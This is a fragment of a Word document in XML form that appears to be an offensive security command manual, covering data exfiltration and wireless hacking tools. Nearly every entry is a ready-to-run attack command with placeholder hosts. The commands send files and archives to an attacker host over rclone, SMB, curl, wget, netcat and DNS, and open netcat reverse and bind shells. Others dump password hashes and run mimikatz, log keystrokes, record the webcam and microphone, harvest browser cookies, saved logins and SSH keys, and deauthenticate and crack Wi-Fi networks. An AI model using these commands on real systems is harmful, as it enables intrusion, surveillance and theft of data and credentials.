        <w:t xml:space="preserve">Versatile cloud storage sync tool repurposed for data exfiltration.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rclone copy {local_path} {remote}:{bucket}/{path} &gt; /opt/tsec/output/9.1.1_rclone_upload.txt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rclone sync {local_path} {remote}:{bucket} --progress &gt; /opt/tsec/output/9.1.2_rclone_sync.txt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Bandwidth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rclone copy {local_path} {remote}:{path} --bwlimit 500K &gt; /opt/tsec/output/9.1.3_rclone_throttle.txt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rclone copy {local_path} {remote}:{path} --include '*.pdf' --include '*.doc*' &gt; /opt/tsec/output/9.1.4_rclone_filter.txt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rclone copy {local_path} crypt-{remote}:{path} &gt; /opt/tsec/output/9.1.5_rclone_encrypt.txt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 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rclone copy {local_path} sftp:{remote_path} --sftp-host {host} --sftp-user {user} &gt; /opt/tsec/output/9.1.6_rclone_sftp.txt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rclone copy {local_path} {remote}:{path} --min-size 1M --max-size 100M &gt; /opt/tsec/output/9.1.7_rclone_size.txt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rclone copy {local_path} {remote}:{path} --dry-run -v &gt; /opt/tsec/output/9.1.8_rclone_dryrun.txt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rclone move {local_path} {remote}:{path} &gt; /opt/tsec/output/9.1.9_rclone_move.txt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Exfil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rclone sync {sensitive_path} {remote}:{path} --include '*.{pdf,doc,docx,xls,xlsx,db,sql}' --bwlimit 1M --progress &gt; /opt/tsec/output/9.1.10_rclone_full.txt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14"/>
    <w:bookmarkStart w:id="115" w:name="tool-9.2-impacket-smbserver"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 9.2 — impacket-smbserver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Quick SMB share for file transfer without external infrastructure.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smbserver.py -smb2support {share_name} {share_path} &gt; /opt/tsec/output/9.2.1_smbserver_basic.log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smbserver.py -smb2support -username {user} -password {password} {name} {path} &gt; /opt/tsec/output/9.2.2_smbserver_auth.log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\\{lhost}\\{share}\\{file} copied to {local}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smbserver.py -smb2support -comment 'Upload' upload {path} &gt; /opt/tsec/output/9.2.4_smbserver_upload.log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smbserver.py -smb2support -ip {ip} {name} {path} &gt; /opt/tsec/output/9.2.5_smbserver_ip.log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smbserver.py -smb2support -port 4455 {name} {path} &gt; /opt/tsec/output/9.2.6_smbserver_port.log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smbserver.py -smb2support -debug {name} {path} &gt; /opt/tsec/output/9.2.7_smbserver_debug.log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smbserver.py -smb2support -no-auth {name} {path} &gt; /opt/tsec/output/9.2.8_smbserver_noauth.log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{file} \\{lhost}\\{share}\\ &gt; /opt/tsec/output/9.2.9_smbserver_target.txt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smbserver.py -smb2support -username admin -password admin -ip {ip} data /tmp/data &gt; /opt/tsec/output/9.2.10_smbserver_full.log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</w:tbl>
    <w:bookmarkEnd w:id="115"/>
    <w:bookmarkStart w:id="116" w:name="tool-9.3-netcat-ncat"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 9.3 — netcat / ncat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Networking utility for file transfer, reverse shells, and port scanning.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Receive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 -l -p {port} &gt; /opt/tsec/output/9.3.1_nc_received_file.bin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 {lhost} {port} &lt; {file} &gt; /opt/tsec/output/9.3.2_nc_sent.txt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ncat --ssl -l {port} --recv-only &gt; /opt/tsec/output/9.3.3_ncat_ssl.bin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 -e /bin/sh {lhost} {lport} &gt; /opt/tsec/output/9.3.4_nc_revshell.txt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 -l -p {port} -e /bin/sh &gt; /opt/tsec/output/9.3.5_nc_bindshell.txt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 -zv {target} {port_start}-{port_end} &gt; /opt/tsec/output/9.3.6_nc_scan.txt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Grab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echo '' \| nc -v -w 1 {target} {port} &gt; /opt/tsec/output/9.3.7_nc_banner.txt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printf 'GET / HTTP/1.0\r\n\r\n' \| nc {target} 80 &gt; /opt/tsec/output/9.3.8_nc_http.txt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 -u -l -p {port} &gt; /opt/tsec/output/9.3.9_nc_udp.bin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 czf - {directory} \| nc {lhost} {port} &gt; /opt/tsec/output/9.3.10_nc_stream.txt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16"/>
    <w:bookmarkStart w:id="117" w:name="tool-9.4-metasploit-post-exploitation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 9.4 — Metasploit Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Data collection, system enumeration, and targeted actions.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search -f *.pdf -d C:\\ &gt; /opt/tsec/output/9.4.1_msf_search.txt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download {remote_file} {local_path} &gt; /opt/tsec/output/9.4.2_msf_download.txt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upload {local_file} {remote_path} &gt; /opt/tsec/output/9.4.3_msf_upload.txt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screenshot -p /opt/tsec/output/9.4.4_msf_screenshot.png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Keylogger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keyscan_start &gt; /opt/tsec/output/9.4.5_msf_keylog.txt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hashdump &gt; /opt/tsec/output/9.4.6_msf_hashdump.txt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record_mic -d 60 -f /opt/tsec/output/9.4.7_msf_audio.wav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Webcam Snap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webcam_snap -p /opt/tsec/output/9.4.8_msf_webcam.jpg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Loot Collect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loot -t files &gt; /opt/tsec/output/9.4.9_msf_loot.txt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meterpreter &gt; run post/windows/gather/enum_files; screenshot; keyscan_dump; hashdump &gt; /opt/tsec/output/9.4.10_msf_full.txt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17"/>
    <w:bookmarkStart w:id="118" w:name="tool-9.5-powershell-empire"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 9.5 — PowerShell Empire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Post-exploitation agent with pure PowerShell capabilities.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empire &gt; agents &gt; /opt/tsec/output/9.5.1_empire_agents.txt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empire &gt; usemodule &lt;TAB&gt; &gt; /opt/tsec/output/9.5.2_empire_modules.txt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Keylogger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empire &gt; usemodule powershell/collection/keylogger; set Agent {agent}; execute &gt; /opt/tsec/output/9.5.3_empire_keylog.txt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empire &gt; usemodule powershell/collection/screenshot; set Agent {agent}; execute &gt; /opt/tsec/output/9.5.4_empire_screenshot.txt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empire &gt; usemodule powershell/collection/clipboard_monitor; set Agent {agent}; execute &gt; /opt/tsec/output/9.5.5_empire_clipboard.txt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Finder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empire &gt; usemodule powershell/situational_awareness/network/powerview/find_localadmin_access; execute &gt; /opt/tsec/output/9.5.6_empire_localadmin.txt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Mimikatz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empire &gt; usemodule powershell/credentials/mimikatz/logonpasswords; set Agent {agent}; execute &gt; /opt/tsec/output/9.5.7_empire_mimikatz.txt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empire &gt; usemodule powershell/credentials/tokens; set Agent {agent}; execute &gt; /opt/tsec/output/9.5.8_empire_tokens.txt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empire &gt; shell dir C:\\Users\\ /s \| findstr '.pdf' &gt; /opt/tsec/output/9.5.9_empire_filesearch.txt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empire &gt; usemodule powershell/collection/keylogger; usemodule powershell/collection/screenshot; usemodule powershell/credentials/mimikatz/logonpasswords; execute &gt; /opt/tsec/output/9.5.10_empire_full.txt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18"/>
    <w:bookmarkStart w:id="119" w:name="tool-9.6-unix-text-processing-toolkit"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 9.6 — Unix Text Processing Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Core utilities for parsing logs and searching for sensitive data.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-ri 'password\|passwd\|pwd' {directory} 2&gt;/dev/null &gt; /opt/tsec/output/9.6.1_grep_creds.txt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Parse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-E '^(user\|pass\|host\|port\|key)' {config_file} &gt; /opt/tsec/output/9.6.2_grep_config.txt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awk '/{pattern}/{print $0}' {log_file} &gt; /opt/tsec/output/9.6.3_awk_logs.txt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awk -F',' '{print $1, $3}' {csv_file} &gt; /opt/tsec/output/9.6.4_awk_csv.txt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{directory} -type f \( -name '*.conf' -o -name '*.ini' -o -name '*.xml' \) &gt; /opt/tsec/output/9.6.5_find_configs.txt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{directory} -name '*.db' -o -name '*.sql' -o -name '*.sqlite' &gt; /opt/tsec/output/9.6.6_find_dbs.txt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Collect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/home/*/.bash_history /root/.bash_history 2&gt;/dev/null &gt; /opt/tsec/output/9.6.7_history.txt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Key Harvest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/home -name 'id_rsa' -o -name 'id_ed25519' 2&gt;/dev/null &gt; /opt/tsec/output/9.6.8_ssh_keys.txt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-r -l -i 'BEGIN OPENSSH PRIVATE KEY\|BEGIN RSA PRIVATE KEY\|AKIA' {path} &gt; /opt/tsec/output/9.6.9_grep_sensitive.txt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Sweep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{directory} -type f \( -name '*.pdf' -o -name '*.doc*' -o -name '*.xls*' \) -exec cp {} {staging}/ + &gt; /opt/tsec/output/9.6.10_full_sweep.txt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19"/>
    <w:bookmarkStart w:id="120" w:name="tool-9.7-curl-wget"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 9.7 — curl / wget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP clients for data exfiltration through HTTP/HTTPS.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 'file=@{file}' http://{lhost}:{port}/upload &gt; /opt/tsec/output/9.7.1_curl_upload.txt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-T {file} http://{lhost}:{port}/{path} &gt; /opt/tsec/output/9.7.2_curl_put.txt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-X POST -d '{data}' http://{lhost}:{port}/receive &gt; /opt/tsec/output/9.7.3_curl_post.txt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{file} \| base64 \| curl -X POST -d @- http://{lhost}:{port}/ &gt; /opt/tsec/output/9.7.4_curl_base64.txt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-k -F 'file=@{file}' https://{lhost}:{port}/upload &gt; /opt/tsec/output/9.7.5_curl_https.txt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WGET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wget --post-file={file} http://{lhost}:{port}/receive &gt; /opt/tsec/output/9.7.6_wget_upload.txt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Chunked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--limit-rate 100K -F 'file=@{file}' http://{lhost}:{port}/upload &gt; /opt/tsec/output/9.7.7_curl_throttle.txt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-H 'X-Data: secret' -F 'file=@{file}' http://{lhost}:{port}/ &gt; /opt/tsec/output/9.7.8_curl_header.txt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-x http://{proxy}:{port} -F 'file=@{file}' http://{lhost}/upload &gt; /opt/tsec/output/9.7.9_curl_proxy.txt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 czf - {directory} \| base64 \| curl -X POST -d @- http://{lhost}:{port}/exfil &gt; /opt/tsec/output/9.7.10_curl_full.txt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20"/>
    <w:bookmarkStart w:id="121" w:name="tool-9.8-dnsexfiltrator"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 9.8 — DNSExfiltrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Covert data exfiltration through DNS queries.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DNS Exfil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dns-exfiltrator.py -f {file} -d {domain} -n {nameserver} &gt; /opt/tsec/output/9.8.1_dns_exfil.txt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Exfil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dns-exfiltrator.py -s '{data}' -d {domain} -n {nameserver} &gt; /opt/tsec/output/9.8.2_dns_string.txt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Iodine Tunnel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iodine -f -P {password} {nameserver} {domain} &gt; /opt/tsec/output/9.8.3_iodine_tunnel.txt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Iodine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iodined -f -P {password} -c {tun_ip} {domain} &gt; /opt/tsec/output/9.8.4_iodined_server.txt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Chunked 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dns-exfiltrator.py -f {file} -d {domain} -c 50 &gt; /opt/tsec/output/9.8.5_dns_chunked.txt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Base32 Encoding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dns-exfiltrator.py -f {file} -d {domain} -b &gt; /opt/tsec/output/9.8.6_dns_base32.txt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Tunnel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iodine -r -P {password} {nameserver} {domain} &gt; /opt/tsec/output/9.8.7_iodine_reverse.txt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dns-exfiltrator.py -f /dev/zero -s 10M -d {domain} &gt; /opt/tsec/output/9.8.8_dns_throughput.txt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Tunnel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iodine -f -P {password} -T TXT {nameserver} {domain} &gt; /opt/tsec/output/9.8.9_iodine_encrypted.txt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Exfil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{sensitive_file} \| gzip \| base64 \| python3 dns-exfiltrator.py -s - -d {domain} -n {ns} &gt; /opt/tsec/output/9.8.10_dns_full.txt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21"/>
    <w:bookmarkStart w:id="122" w:name="tool-9.9-sqlite3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 9.9 — sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Command-line interface for SQLite database extraction.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 {database}.db '.tables' &gt; /opt/tsec/output/9.9.1_sqlite3_tables.txt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 {database}.db '.schema {table}' &gt; /opt/tsec/output/9.9.2_sqlite3_schema.txt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 {database}.db 'SELECT * FROM {table}' &gt; /opt/tsec/output/9.9.3_sqlite3_dump.txt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Passwords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 'Login Data' 'SELECT origin_url, username_value FROM logins' &gt; /opt/tsec/output/9.9.4_sqlite3_chrome.txt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 'Cookies' 'SELECT host_key, name, value FROM cookies' &gt; /opt/tsec/output/9.9.5_sqlite3_cookies.txt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 {database}.db '.mode csv' 'SELECT * FROM {table}' &gt; /opt/tsec/output/9.9.6_sqlite3_{table}.csv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 {database}.db '.dump' &gt; /opt/tsec/output/9.9.7_sqlite3_full.sql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 {database}.db 'SELECT * FROM {table} WHERE {column} LIKE "%pass%"' &gt; /opt/tsec/output/9.9.8_sqlite3_search.txt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All DBs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/home -name '*.sqlite' -o -name '*.db' 2&gt;/dev/null \| xargs -I {} sqlite3 {} '.tables' &gt; /opt/tsec/output/9.9.9_sqlite3_findall.txt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with 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 {database}.db '.mode csv' '.headers on' 'SELECT * FROM {table}' &gt; /opt/tsec/output/9.9.10_sqlite3_headers.csv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</w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="122"/>
    <w:bookmarkStart w:id="123" w:name="tool-9.10-find-ziptar"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 9.10 — find + zip/tar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">File discovery and compression for efficient exfiltration.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PDFs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{directory} -type f -name '*.pdf' &gt; /opt/tsec/output/9.10.1_find_pdfs.txt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 czf /opt/tsec/output/9.10.2_archive_{name}.tar.gz -C {directory}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{directory} -name '*.doc' -o -name '*.pdf' \| tar czf /opt/tsec/output/9.10.3_selective.tar.gz -T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{directory} -type f -size +1M -size -100M &gt; /opt/tsec/output/9.10.4_find_size.txt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{directory} -type f -mtime -7 &gt; /opt/tsec/output/9.10.5_find_recent.txt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Key Collect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/home -type f \( -name 'id_rsa' -o -name '*.pem' \) 2&gt;/dev/null &gt; /opt/tsec/output/9.10.6_find_sshkeys.txt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{directory} -type f \( -name '*.db' -o -name '*.sqlite' -o -name '*.sql' \) &gt; /opt/tsec/output/9.10.7_find_dbs.txt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Harvest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{directory} -type f \( -name '*.conf' -o -name '*.config' -o -name '*.ini' -o -name '*.xml' -o -name '*.env' \) &gt; /opt/tsec/output/9.10.8_find_configs.txt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 czf /opt/tsec/output/9.10.9_archive_clean.tar.gz --exclude='node_modules' --exclude='.git' {directory}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{directory} -type f \( -name '*.pdf' -o -name '*.doc*' -o -name '*.xls*' -o -name '*.db' \) -exec tar czf /opt/tsec/output/9.10.10_full_collection.tar.gz {}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TAR.GZ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43" w:name="phase-10-wireless-hacking"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 10: Wireless Hacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Assess wireless network security across Wi-Fi, Bluetooth, and RF protocols. Capture handshakes, crack encryption, and deploy rogue access points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="125" w:name="tool-10.1-aircrack-ng"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 10.1 — Aircrack-ng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Complete suite for Wi-Fi network security assessment.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airmon-ng start {interface} &gt; /opt/tsec/output/10.1.1_aircrack_monitor.txt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airodump-ng {interface_mon} --write /opt/tsec/output/10.1.2_aircrack_scan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airodump-ng -c {channel} --bssid {bssid} -w /opt/tsec/output/10.1.3_aircrack_target {interface_mon}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Deauth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aireplay-ng -0 {count} -a {bssid} -c {client_mac} {interface_mon} &gt; /opt/tsec/output/10.1.4_aircrack_deauth.txt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WPA Cracking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aircrack-ng -w {wordlist} -b {bssid} /opt/tsec/output/10.1.3_aircrack_target-01.cap &gt; /opt/tsec/output/10.1.5_aircrack_crack.txt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WEP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aireplay-ng -3 -b {bssid} -h {mac} {interface_mon} &gt; /opt/tsec/output/10.1.6_aircrack_wep.txt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aireplay-ng -1 0 -a {bssid} -h {mac} {interface_mon} &gt; /opt/tsec/output/10.1.7_aircrack_fakeauth.txt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Forge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packetforge-ng -0 -a {bssid} -h {mac} -k {ip_dst} -l {ip_src} -y {prga} -w /opt/tsec/output/10.1.8_aircrack_forge.cap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PMKID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{interface} -o /opt/tsec/output/10.1.9_aircrack_pmkid.pcapng --enable_status=1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WPA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airmon-ng start {iface} &amp;&amp; airodump-ng -c {ch} --bssid {bssid} -w /opt/tsec/output/10.1.10_aircrack_full {iface_mon} &amp; aireplay-ng -0 10 -a {bssid} -c {client} {iface_mon}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</w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="125"/>
    <w:bookmarkStart w:id="126" w:name="tool-10.2-wifite2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 10.2 — Wifite2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Automated wireless attack tool for WEP, WPA, and WPS.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wifite --kill --cracked &gt; /opt/tsec/output/10.2.1_wifite_auto.txt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WPA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wifite -i {interface} --wpa --dict {wordlist} &gt; /opt/tsec/output/10.2.2_wifite_wpa.txt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WPS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wifite -i {interface} --wps --pixie &gt; /opt/tsec/output/10.2.3_wifite_wps.txt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PMKID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wifite -i {interface} --pmkid --dict {wordlist} &gt; /opt/tsec/output/10.2.4_wifite_pmkid.txt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wifite -i {interface} --dict {wordlist} &gt; /opt/tsec/output/10.2.5_wifite_dict.txt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wifite -i {interface} -c 1,6,11 &gt; /opt/tsec/output/10.2.6_wifite_channel.txt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wifite -i {interface} --pow 50 &gt; /opt/tsec/output/10.2.7_wifite_power.txt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Cracked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wifite --cracked &gt; /opt/tsec/output/10.2.8_wifite_cracked.txt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Handshake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wifite --check {capture_file} &gt; /opt/tsec/output/10.2.9_wifite_verify.txt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wifite --kill --wpa --wps --pmkid --dict {wordlist} -p 30 &gt; /opt/tsec/output/10.2.10_wifite_full.txt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26"/>
    <w:bookmarkStart w:id="127" w:name="tool-10.3-hcxtools"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 10.3 — hcxtools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">WLAN attack and capture tools for PMKID and handshake cracking.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PMKID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{interface} -o /opt/tsec/output/10.3.1_hcxdump_pmkid.pcapng --enable_status=15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Hashcat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hcxpcapngtool -o /opt/tsec/output/10.3.2_hcxconv_hash.22000 -E /opt/tsec/output/10.3.2_hcxconv_essid.txt {capture}.pcapng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BSSID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hcxpcapngtool -o /opt/tsec/output/10.3.3_hcxconv_filtered.22000 --filtermode=2 --filterlist={bssid_file} {capture}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/opt/tsec/output/10.3.4_hcxdump_mac.pcapng --filterlist_ap={mac_file} --filtermode=2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Client-less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/opt/tsec/output/10.3.5_hcxdump_clientless.pcapng --enable_status=1 --active_beacon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/opt/tsec/output/10.3.6_hcxdump_assess.pcapng --do_rcascan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/opt/tsec/output/10.3.7_hcxdump_gps.pcapng --use_gpsd=localhost:2947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hcxhashtool -i {hash}.22000 --info=stdout &gt; /opt/tsec/output/10.3.8_hcxhashtool_info.txt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ESSID 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hcxpcapngtool -o {hash}.22000 -E /opt/tsec/output/10.3.9_hcxconv_essidlist.txt --essid=stdout {capture} &gt; /opt/tsec/output/10.3.9_hcxconv_essids.txt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/opt/tsec/output/10.3.10_hcxdump_full.pcapng --enable_status=15 --active_beacon --channel=1,6,11 &amp;&amp; hcxpcapngtool -o /opt/tsec/output/10.3.10_hcxconv_full.22000 /opt/tsec/output/10.3.10_hcxdump_full.pcapng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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="127"/>
    <w:bookmarkStart w:id="128" w:name="tool-10.4-hashcat-wi-fi-modes"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 10.4 — hashcat (Wi-Fi Modes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">GPU-accelerated Wi-Fi password cracking.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WPA2 Crack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2500 -a 0 {capture}.hccapx {wordlist} -o /opt/tsec/output/10.4.1_hashcat_wpa2.txt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PMKID Crack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22000 -a 0 {hash}.22000 {wordlist} -o /opt/tsec/output/10.4.2_hashcat_pmkid.txt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22000 -a 3 {hash}.22000 '?u?l?l?l?l?d?d?d?d' -o /opt/tsec/output/10.4.3_hashcat_mask.txt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22000 -a 0 {hash}.22000 {wordlist} -r {rules} -o /opt/tsec/output/10.4.4_hashcat_rules.txt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22000 -a 3 {hash}.22000 '?a?a?a?a?a?a?a?a' -o /opt/tsec/output/10.4.5_hashcat_brute.txt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22000 -a 0 {hash}.22000 {wordlist} -o /opt/tsec/output/10.4.6_hashcat_cracked.txt --session={name}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Cracked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22000 {hash}.22000 --show &gt; /opt/tsec/output/10.4.7_hashcat_show.txt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22000 -b &gt; /opt/tsec/output/10.4.8_hashcat_benchmark.txt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 Wordlist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22000 -a 0 {hash}.22000 {wordlist1} {wordlist2} -o /opt/tsec/output/10.4.9_hashcat_multi.txt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 Crack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hashcat -m 22000 -a 0 {hash}.22000 {wordlist} -O -w 3 -o /opt/tsec/output/10.4.10_hashcat_optimized.txt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28"/>
    <w:bookmarkStart w:id="129" w:name="tool-10.5-reaver"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 10.5 — Reaver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">WPS PIN brute-forcing to recover WPA/WPA2 passphrases.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reaver -i {interface} -b {bssid} -vv &gt; /opt/tsec/output/10.5.1_reaver_basic.txt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reaver -i {interface} -b {bssid} -c {channel} -vv &gt; /opt/tsec/output/10.5.2_reaver_channel.txt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reaver -i {interface} -b {bssid} -d 5 -vv &gt; /opt/tsec/output/10.5.3_reaver_delay.txt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reaver -i {interface} -b {bssid} -p {pin} -vv &gt; /opt/tsec/output/10.5.4_reaver_pin.txt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Spoof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reaver -i {interface} -b {bssid} -vv -N -n &gt; /opt/tsec/output/10.5.5_reaver_nospoof.txt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reaver -i {interface} -b {bssid} -t 30 -x 60 -vv &gt; /opt/tsec/output/10.5.6_reaver_timeout.txt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Resume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reaver -i {interface} -b {bssid} -s {session_file} -vv &gt; /opt/tsec/output/10.5.7_reaver_resume.txt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 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reaver -i {interface} -b {bssid} -L -vv &gt; /opt/tsec/output/10.5.8_reaver_ignore.txt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Pixie Dust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reaver -i {interface} -b {bssid} -vv -K 1 &gt; /opt/tsec/output/10.5.9_reaver_pixie.txt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reaver -i {interface} -b {bssid} -c {ch} -vv -K 1 -t 30 -d 5 -L &gt; /opt/tsec/output/10.5.10_reaver_full.txt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29"/>
    <w:bookmarkStart w:id="130" w:name="tool-10.6-bully"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 10.6 — Bully</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modern, efficient WPS brute-forcing tool.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bully -b {bssid} -c {channel} {interface} &gt; /opt/tsec/output/10.6.1_bully_basic.txt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bully -b {bssid} -c {channel} -v 3 {interface} &gt; /opt/tsec/output/10.6.2_bully_verbose.txt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bully -b {bssid} -c {channel} -F {interface} &gt; /opt/tsec/output/10.6.3_bully_force.txt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bully -b {bssid} -c {channel} -p {pin} {interface} &gt; /opt/tsec/output/10.6.4_bully_pin.txt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Restore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bully -b {bssid} -s {session_file} {interface} &gt; /opt/tsec/output/10.6.5_bully_resume.txt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bully -b {bssid} -c {channel} -B {interface} &gt; /opt/tsec/output/10.6.6_bully_brute.txt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Random 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bully -b {bssid} -c {channel} -R {interface} &gt; /opt/tsec/output/10.6.7_bully_norandom.txt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 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bully -b {bssid} -c {channel} -r {retries} {interface} &gt; /opt/tsec/output/10.6.8_bully_retry.txt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bully -b {bssid} -c {channel} -o /opt/tsec/output/10.6.9_bully_detect.txt {interface}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bully -b {bssid} -c {channel} -v 3 -F -B -o /opt/tsec/output/10.6.10_bully_full.txt {interface}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30"/>
    <w:bookmarkStart w:id="131" w:name="tool-10.7-bettercap-wireless"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 10.7 — Bettercap (Wireless)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network attack and monitoring framework with wireless capabilities.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bettercap -iface {interface} -eval 'wifi.recon on; wifi.show' &gt; /opt/tsec/output/10.7.1_bettercap_wifi.txt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PMKID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bettercap -iface {interface} -eval 'wifi.recon on; wifi.assoc {bssid}' &gt; /opt/tsec/output/10.7.2_bettercap_pmkid.txt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Deauth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bettercap -iface {interface} -eval 'wifi.recon on; wifi.deauth {bssid}' &gt; /opt/tsec/output/10.7.3_bettercap_deauth.txt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Handshake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bettercap -iface {interface} -eval 'wifi.recon on; set wifi.handshakes.file /opt/tsec/output/10.7.4_bettercap_handshakes.pcap' &gt; /opt/tsec/output/10.7.4_bettercap_handshake.txt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bettercap -eval 'ble.recon on; ble.show' &gt; /opt/tsec/output/10.7.5_bettercap_ble.txt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bettercap -eval 'hid.inject {script}' &gt; /opt/tsec/output/10.7.6_bettercap_hid.txt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MouseJack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bettercap -eval 'hid.scan; hid.sniff; hid.inject {script}' &gt; /opt/tsec/output/10.7.7_bettercap_mousejack.txt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bettercap -iface {interface} -eval 'wifi.recon on; wifi.channel 1,6,11' &gt; /opt/tsec/output/10.7.8_bettercap_channel.txt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bettercap -iface {interface} -eval 'wifi.recon on; set wifi.handshakes.file /opt/tsec/output/10.7.9_bettercap.pcap' &gt; /opt/tsec/output/10.7.9_bettercap_save.txt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bettercap -iface {interface} -eval 'wifi.recon on; wifi.channel 1,6,11; wifi.assoc all; set wifi.handshakes.file /opt/tsec/output/10.7.10_bettercap_full.pcap' &gt; /opt/tsec/output/10.7.10_bettercap_full.txt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31"/>
